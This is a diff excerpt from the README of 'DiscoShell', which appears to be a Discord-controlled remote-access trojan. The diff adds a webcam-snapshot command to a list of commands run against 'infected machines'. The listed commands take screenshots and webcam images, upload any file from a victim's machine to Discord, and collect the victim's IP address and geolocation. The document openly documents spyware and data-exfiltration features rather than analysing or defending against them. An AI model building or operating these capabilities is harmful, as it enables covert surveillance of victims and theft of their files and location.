Design-Enginnering/DiscoShell/README.md

 Note: Prefix can be customised
 ```
 get : Get username, machine name and screenshot of all infected machines.
+getcam : Get snapshot from all video sources on specified machine.
 getfile {machine_name} {file_path} : Upload file located in {file_path} on specified machine to Discord.
 ipinfo {machine_name} : Get IP address and geolocation of specified machine.